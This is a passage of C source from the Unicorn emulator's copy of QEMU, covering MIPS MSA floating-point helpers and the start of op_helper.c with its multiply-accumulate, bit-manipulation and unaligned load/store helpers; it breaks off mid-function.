MSA_FLOAT_MAXOP(pwx->w[2], max, pwt->w[2], pwt->w[2], 32); } else { MSA_FLOAT_MAXOP(pwx->w[2], max, pws->w[2], pwt->w[2], 32); } if (NUMBER_QNAN_PAIR(pws->w[3], pwt->w[3], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[3], max, pws->w[3], pws->w[3], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[3], pws->w[3], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[3], max, pwt->w[3], pwt->w[3], 32); } else { MSA_FLOAT_MAXOP(pwx->w[3], max, pws->w[3], pwt->w[3], 32); } } else if (df == DF_DOUBLE) { if (NUMBER_QNAN_PAIR(pws->d[0], pwt->d[0], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[0], max, pws->d[0], pws->d[0], 64); } else if (NUMBER_QNAN_PAIR(pwt->d[0], pws->d[0], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[0], max, pwt->d[0], pwt->d[0], 64); } else { MSA_FLOAT_MAXOP(pwx->d[0], max, pws->d[0], pwt->d[0], 64); } if (NUMBER_QNAN_PAIR(pws->d[1], pwt->d[1], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[1], max, pws->d[1], pws->d[1], 64); } else if (NUMBER_QNAN_PAIR(pwt->d[1], pws->d[1], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[1], max, pwt->d[1], pwt->d[1], 64); } else { MSA_FLOAT_MAXOP(pwx->d[1], max, pws->d[1], pwt->d[1], 64); } } else { assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fmax_a_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { float_status *status = &env->active_tc.msa_fp_status; wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); clear_msacsr_cause(env); if (df == DF_WORD) { FMAXMIN_A(max, min, pwx->w[0], pws->w[0], pwt->w[0], 32, status); FMAXMIN_A(max, min, pwx->w[1], pws->w[1], pwt->w[1], 32, status); FMAXMIN_A(max, min, pwx->w[2], pws->w[2], pwt->w[2], 32, status); FMAXMIN_A(max, min, pwx->w[3], pws->w[3], pwt->w[3], 32, status); } else if (df == DF_DOUBLE) { FMAXMIN_A(max, min, pwx->d[0], pws->d[0], pwt->d[0], 64, status); FMAXMIN_A(max, min, pwx->d[1], pws->d[1], pwt->d[1], 64, status); } else { assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fclass_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { float_status *status = &env->active_tc.msa_fp_status; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); if (df == DF_WORD) { pwd->w[0] = float_class_s(pws->w[0], status); pwd->w[1] = float_class_s(pws->w[1], status); pwd->w[2] = float_class_s(pws->w[2], status); pwd->w[3] = float_class_s(pws->w[3], status); } else if (df == DF_DOUBLE) { pwd->d[0] = float_class_d(pws->d[0], status); pwd->d[1] = float_class_d(pws->d[1], status); } else { assert(0); } } #define MSA_FLOAT_UNOP0(DEST, OP, ARG, BITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, status); \ DEST = float ## BITS ## _ ## OP(ARG, status); \ c = update_msacsr(env, CLEAR_FS_UNDERFLOW, 0); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } else if (float ## BITS ## _is_any_nan(ARG)) { \ DEST = 0; \ } \ } while (0) void helper_msa_ftrunc_s_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP0(pwx->w[i], to_int32_round_to_zero, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP0(pwx->d[i], to_int64_round_to_zero, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_ftrunc_u_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP0(pwx->w[i], to_uint32_round_to_zero, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP0(pwx->d[i], to_uint64_round_to_zero, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fsqrt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP(pwx->w[i], sqrt, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], sqrt, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } #define MSA_FLOAT_RECIPROCAL(DEST, ARG, BITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, status); \ DEST = float ## BITS ## _ ## div(FLOAT_ONE ## BITS, ARG, status); \ c = update_msacsr(env, float ## BITS ## _is_infinity(ARG) || \ float ## BITS ## _is_quiet_nan(DEST, status) ? \ 0 : RECIPROCAL_INEXACT, \ IS_DENORMAL(DEST, BITS)); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } \ } while (0) void helper_msa_frsqrt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_RECIPROCAL(pwx->w[i], float32_sqrt(pws->w[i], &env->active_tc.msa_fp_status), 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_RECIPROCAL(pwx->d[i], float64_sqrt(pws->d[i], &env->active_tc.msa_fp_status), 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_frcp_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_RECIPROCAL(pwx->w[i], pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_RECIPROCAL(pwx->d[i], pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_frint_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP(pwx->w[i], round_to_int, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], round_to_int, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } #define MSA_FLOAT_LOGB(DEST, ARG, BITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, status); \ set_float_rounding_mode(float_round_down, status); \ DEST = float ## BITS ## _ ## log2(ARG, status); \ DEST = float ## BITS ## _ ## round_to_int(DEST, status); \ set_float_rounding_mode(ieee_rm[(env->active_tc.msacsr & \ MSACSR_RM_MASK) >> MSACSR_RM], \ status); \ \ set_float_exception_flags(get_float_exception_flags(status) & \ (~float_flag_inexact), \ status); \ \ c = update_msacsr(env, 0, IS_DENORMAL(DEST, BITS)); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } \ } while (0) void helper_msa_flog2_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_LOGB(pwx->w[i], pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_LOGB(pwx->d[i], pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fexupl_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { /* * Half precision floats come in two formats: standard * IEEE and "ARM" format. The latter gains extra exponent * range by omitting the NaN/Inf encodings. */ flag ieee = 1; MSA_FLOAT_BINOP(pwx->w[i], from_float16, Lh(pws, i), ieee, 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], from_float32, Lw(pws, i), 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fexupr_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { /* * Half precision floats come in two formats: standard * IEEE and "ARM" format. The latter gains extra exponent * range by omitting the NaN/Inf encodings. */ flag ieee = 1; MSA_FLOAT_BINOP(pwx->w[i], from_float16, Rh(pws, i), ieee, 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], from_float32, Rw(pws, i), 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_ffql_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP(pwx->w[i], from_q16, Lh(pws, i), 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], from_q32, Lw(pws, i), 64); } break; default: assert(0); } msa_move_v(pwd, pwx); } void helper_msa_ffqr_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP(pwx->w[i], from_q16, Rh(pws, i), 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], from_q32, Rw(pws, i), 64); } break; default: assert(0); } msa_move_v(pwd, pwx); } void helper_msa_ftint_s_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP0(pwx->w[i], to_int32, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP0(pwx->d[i], to_int64, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_ftint_u_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP0(pwx->w[i], to_uint32, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP0(pwx->d[i], to_uint64, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } #define float32_from_int32 int32_to_float32 #define float32_from_uint32 uint32_to_float32 #define float64_from_int64 int64_to_float64 #define float64_from_uint64 uint64_to_float64 void helper_msa_ffint_s_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP(pwx->w[i], from_int32, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], from_int64, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_ffint_u_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP(pwx->w[i], from_uint32, pws->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(pwx->d[i], from_uint64, pws->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } �������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/mips/op_helper.c����������������������������������������������������������0000664�0000000�0000000�00000130426�14675241067�0020540�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * MIPS emulation helpers for qemu. * * Copyright (c) 2004-2005 Jocelyn Mayer * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. * */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "qemu/host-utils.h" #include "exec/helper-proto.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "exec/memop.h" /*****************************************************************************/ /* Exceptions processing helpers */ void helper_raise_exception_err(CPUMIPSState *env, uint32_t exception, int error_code) { do_raise_exception_err(env, exception, error_code, 0); } void helper_raise_exception(CPUMIPSState *env, uint32_t exception) { do_raise_exception(env, exception, GETPC()); } void helper_raise_exception_debug(CPUMIPSState *env) { do_raise_exception(env, EXCP_DEBUG, 0); } static void raise_exception(CPUMIPSState *env, uint32_t exception) { do_raise_exception(env, exception, 0); } /* 64 bits arithmetic for 32 bits hosts */ static inline uint64_t get_HILO(CPUMIPSState *env) { return ((uint64_t)(env->active_tc.HI[0]) << 32) | (uint32_t)env->active_tc.LO[0]; } static inline target_ulong set_HIT0_LO(CPUMIPSState *env, uint64_t HILO) { env->active_tc.LO[0] = (int32_t)(HILO & 0xFFFFFFFF); return env->active_tc.HI[0] = (int32_t)(HILO >> 32); } static inline target_ulong set_HI_LOT0(CPUMIPSState *env, uint64_t HILO) { target_ulong tmp = env->active_tc.LO[0] = (int32_t)(HILO & 0xFFFFFFFF); env->active_tc.HI[0] = (int32_t)(HILO >> 32); return tmp; } /* Multiplication variants of the vr54xx. */ target_ulong helper_muls(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HI_LOT0(env, 0 - ((int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2)); } target_ulong helper_mulsu(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HI_LOT0(env, 0 - (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); } target_ulong helper_macc(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HI_LOT0(env, (int64_t)get_HILO(env) + (int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2); } target_ulong helper_macchi(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, (int64_t)get_HILO(env) + (int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2); } target_ulong helper_maccu(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HI_LOT0(env, (uint64_t)get_HILO(env) + (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); } target_ulong helper_macchiu(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, (uint64_t)get_HILO(env) + (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); } target_ulong helper_msac(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HI_LOT0(env, (int64_t)get_HILO(env) - (int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2); } target_ulong helper_msachi(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, (int64_t)get_HILO(env) - (int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2); } target_ulong helper_msacu(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HI_LOT0(env, (uint64_t)get_HILO(env) - (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); } target_ulong helper_msachiu(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, (uint64_t)get_HILO(env) - (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); } target_ulong helper_mulhi(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, (int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2); } target_ulong helper_mulhiu(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); } target_ulong helper_mulshi(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, 0 - (int64_t)(int32_t)arg1 * (int64_t)(int32_t)arg2); } target_ulong helper_mulshiu(CPUMIPSState *env, target_ulong arg1, target_ulong arg2) { return set_HIT0_LO(env, 0 - (uint64_t)(uint32_t)arg1 * (uint64_t)(uint32_t)arg2); } static inline target_ulong bitswap(target_ulong v) { v = ((v >> 1) & (target_ulong)0x5555555555555555ULL) | ((v & (target_ulong)0x5555555555555555ULL) << 1); v = ((v >> 2) & (target_ulong)0x3333333333333333ULL) | ((v & (target_ulong)0x3333333333333333ULL) << 2); v = ((v >> 4) & (target_ulong)0x0F0F0F0F0F0F0F0FULL) | ((v & (target_ulong)0x0F0F0F0F0F0F0F0FULL) << 4); return v; } #ifdef TARGET_MIPS64 target_ulong helper_dbitswap(target_ulong rt) { return bitswap(rt); } #endif target_ulong helper_bitswap(target_ulong rt) { return (int32_t)bitswap(rt); } target_ulong helper_rotx(target_ulong rs, uint32_t shift, uint32_t shiftx, uint32_t stripe) { int i; uint64_t tmp0 = ((uint64_t)rs) << 32 | ((uint64_t)rs & 0xffffffff); uint64_t tmp1 = tmp0; for (i = 0; i <= 46; i++) { int s; if (i & 0x8) { s = shift; } else { s = shiftx; } if (stripe != 0 && !(i & 0x4)) { s = ~s; } if (s & 0x10) { if (tmp0 & (1LL << (i + 16))) { tmp1 |= 1LL << i; } else { tmp1 &= ~(1LL << i); } } } uint64_t tmp2 = tmp1; for (i = 0; i <= 38; i++) { int s; if (i & 0x4) { s = shift; } else { s = shiftx; } if (s & 0x8) { if (tmp1 & (1LL << (i + 8))) { tmp2 |= 1LL << i; } else { tmp2 &= ~(1LL << i); } } } uint64_t tmp3 = tmp2; for (i = 0; i <= 34; i++) { int s; if (i & 0x2) { s = shift; } else { s = shiftx; } if (s & 0x4) { if (tmp2 & (1LL << (i + 4))) { tmp3 |= 1LL << i; } else { tmp3 &= ~(1LL << i); } } } uint64_t tmp4 = tmp3; for (i = 0; i <= 32; i++) { int s; if (i & 0x1) { s = shift; } else { s = shiftx; } if (s & 0x2) { if (tmp3 & (1LL << (i + 2))) { tmp4 |= 1LL << i; } else { tmp4 &= ~(1LL << i); } } } uint64_t tmp5 = tmp4; for (i = 0; i <= 31; i++) { int s; s = shift; if (s & 0x1) { if (tmp4 & (1LL << (i + 1))) { tmp5 |= 1LL << i; } else { tmp5 &= ~(1LL << i); } } } return (int64_t)(int32_t)(uint32_t)tmp5; } static inline hwaddr do_translate_address(CPUMIPSState *env, target_ulong address, int rw, uintptr_t retaddr) { hwaddr paddr; CPUState *cs = env_cpu(env); paddr = cpu_mips_translate_address(env, address, rw); if (paddr == -1LL) { cpu_loop_exit_restore(cs, retaddr); } else { return paddr; } } #define HELPER_LD_ATOMIC(name, insn, almask, do_cast) \ target_ulong helper_##name(CPUMIPSState *env, target_ulong arg, int mem_idx) \ { \ if (arg & almask) { \ if (!(env->hflags & MIPS_HFLAG_DM)) { \ env->CP0_BadVAddr = arg; \ } \ do_raise_exception(env, EXCP_AdEL, GETPC()); \ } \ env->CP0_LLAddr = do_translate_address(env, arg, 0, GETPC()); \ env->lladdr = arg; \ env->llval = do_cast cpu_##insn##_mmuidx_ra(env, arg, mem_idx, GETPC()); \ return env->llval; \ } HELPER_LD_ATOMIC(ll, ldl, 0x3, (target_long)(int32_t)) #ifdef TARGET_MIPS64 HELPER_LD_ATOMIC(lld, ldq, 0x7, (target_ulong)) #endif #undef HELPER_LD_ATOMIC #ifdef TARGET_WORDS_BIGENDIAN #define GET_LMASK(v) ((v) & 3) #define GET_OFFSET(addr, offset) (addr + (offset)) #else #define GET_LMASK(v) (((v) & 3) ^ 3) #define GET_OFFSET(addr, offset) (addr - (offset)) #endif void helper_swl(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, int mem_idx) { cpu_stb_mmuidx_ra(env, arg2, (uint8_t)(arg1 >> 24), mem_idx, GETPC()); if (GET_LMASK(arg2) <= 2) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 1), (uint8_t)(arg1 >> 16), mem_idx, GETPC()); } if (GET_LMASK(arg2) <= 1) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 2), (uint8_t)(arg1 >> 8), mem_idx, GETPC()); } if (GET_LMASK(arg2) == 0) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 3), (uint8_t)arg1, mem_idx, GETPC()); } } void helper_swr(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, int mem_idx) { cpu_stb_mmuidx_ra(env, arg2, (uint8_t)arg1, mem_idx, GETPC()); if (GET_LMASK(arg2) >= 1) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -1), (uint8_t)(arg1 >> 8), mem_idx, GETPC()); } if (GET_LMASK(arg2) >= 2) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -2), (uint8_t)(arg1 >> 16), mem_idx, GETPC()); } if (GET_LMASK(arg2) == 3) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -3), (uint8_t)(arg1 >> 24), mem_idx, GETPC()); } } #if defined(TARGET_MIPS64) /* * "half" load and stores. We must do the memory access inline, * or fault handling won't work. */ #ifdef TARGET_WORDS_BIGENDIAN #define GET_LMASK64(v) ((v) & 7) #else #define GET_LMASK64(v) (((v) & 7) ^ 7) #endif void helper_sdl(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, int mem_idx) { cpu_stb_mmuidx_ra(env, arg2, (uint8_t)(arg1 >> 56), mem_idx, GETPC()); if (GET_LMASK64(arg2) <= 6) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 1), (uint8_t)(arg1 >> 48), mem_idx, GETPC()); } if (GET_LMASK64(arg2) <= 5) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 2), (uint8_t)(arg1 >> 40), mem_idx, GETPC()); } if (GET_LMASK64(arg2) <= 4) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 3), (uint8_t)(arg1 >> 32), mem_idx, GETPC()); } if (GET_LMASK64(arg2) <= 3) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 4), (uint8_t)(arg1 >> 24), mem_idx, GETPC()); } if (GET_LMASK64(arg2) <= 2) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 5), (uint8_t)(arg1 >> 16), mem_idx, GETPC()); } if (GET_LMASK64(arg2) <= 1) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 6), (uint8_t)(arg1 >> 8), mem_idx, GETPC()); } if (GET_LMASK64(arg2) <= 0) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, 7), (uint8_t)arg1, mem_idx, GETPC()); } } void helper_sdr(CPUMIPSState *env, target_ulong arg1, target_ulong arg2, int mem_idx) { cpu_stb_mmuidx_ra(env, arg2, (uint8_t)arg1, mem_idx, GETPC()); if (GET_LMASK64(arg2) >= 1) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -1), (uint8_t)(arg1 >> 8), mem_idx, GETPC()); } if (GET_LMASK64(arg2) >= 2) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -2), (uint8_t)(arg1 >> 16), mem_idx, GETPC()); } if (GET_LMASK64(arg2) >= 3) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -3), (uint8_t)(arg1 >> 24), mem_idx, GETPC()); } if (GET_LMASK64(arg2) >= 4) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -4), (uint8_t)(arg1 >> 32), mem_idx, GETPC()); } if (GET_LMASK64(arg2) >= 5) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -5), (uint8_t)(arg1 >> 40), mem_idx, GETPC()); } if (GET_LMASK64(arg2) >= 6) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -6), (uint8_t)(arg1 >> 48), mem_idx, GETPC()); } if (GET_LMASK64(arg2) == 7) { cpu_stb_mmuidx_ra(env, GET_OFFSET(arg2, -7), (uint8_t)(arg1 >> 56), mem_idx, GETPC()); } } #endif /* TARGET_MIPS64 */ static const int multiple_regs[] = { 16, 17, 18, 19, 20, 21, 22, 23, 30 }; void helper_lwm(CPUMIPSState *env, target_ulong addr, target_ulong reglist, uint32_t mem_idx) { target_ulong base_reglist = reglist & 0xf; target_ulong do_r31 = reglist & 0x10; if (base_reglist > 0 && base_reglist <= ARRAY_SIZE(multiple_regs)) { target_ulong i; for (i = 0; i < base_reglist; i++) { env->active_tc.gpr[multiple_regs[i]] = (target_long)cpu_ldl_mmuidx_ra(env, addr, mem_idx, GETPC()); addr += 4; } } if (do_r31) { env->active_tc.gpr[31] = (target_long)cpu_ldl_mmuidx_ra(env, addr, mem_idx, GETPC()); } } void helper_swm(CPUMIPSState *env, target_ulong addr, target_ulong reglist, uint32_t mem_idx) { target_ulong base_reglist = reglist & 0xf; target_ulong do_r31 = reglist & 